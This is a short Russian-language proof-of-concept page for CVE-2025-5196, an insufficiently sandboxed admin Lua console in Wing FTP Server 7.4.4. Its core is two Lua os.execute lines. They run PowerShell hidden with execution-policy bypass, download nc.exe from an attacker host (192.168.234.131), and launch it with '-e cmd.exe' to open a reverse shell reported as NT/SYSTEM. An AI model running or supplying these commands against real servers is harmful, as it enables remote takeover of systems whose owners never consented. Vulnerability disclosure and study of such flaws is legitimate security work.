
Wing FTP Server предоставляет административную консоль написания сценариев Lua, доступную через веб-интерфейс. Аутентифицированные администраторы могут выполнять произвольный код Lua с недостаточной изоляцией. CVE-2025-5196
Wing FTP Server предоставляет административную консоль сценариев Lua, доступную через веб-интерфейс. Аутентифицированные администраторы могут выполнять произвольный код Lua с недостаточной изоляцией ('песочницей').
Затронутая версия: Wing FTP Server 7.4.4 (Windows) | Требуется аутентификация: Да
До 24 мая 2025 года последнюю версию приложения от поставщика можно найти по следующей ссылке: https://www.wftpserver.com/download.htm
Кроме того, можно отметить, что до той же даты опубликован выпуск с примечанием, сообщающим, что уязвимость RCE исправлена в версии 7.4.4. Ссылку на примечания к выпуску можно найти здесь: https://www.wftpserver.com/serverhistory.htm

PoC, связанный с CVE-2025-5196 VulDB

Веб-интерфейс Wing FTP Server


Первая часть команды загрузит nc.exe (netcat для Windows x86) по пути "C:\Users\usuario\Desktop\Drops". Вторая часть выполнит nc.exe 192.168.234.131 4443 -e cme.exe.
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')

Оболочка NT/SYSTEM
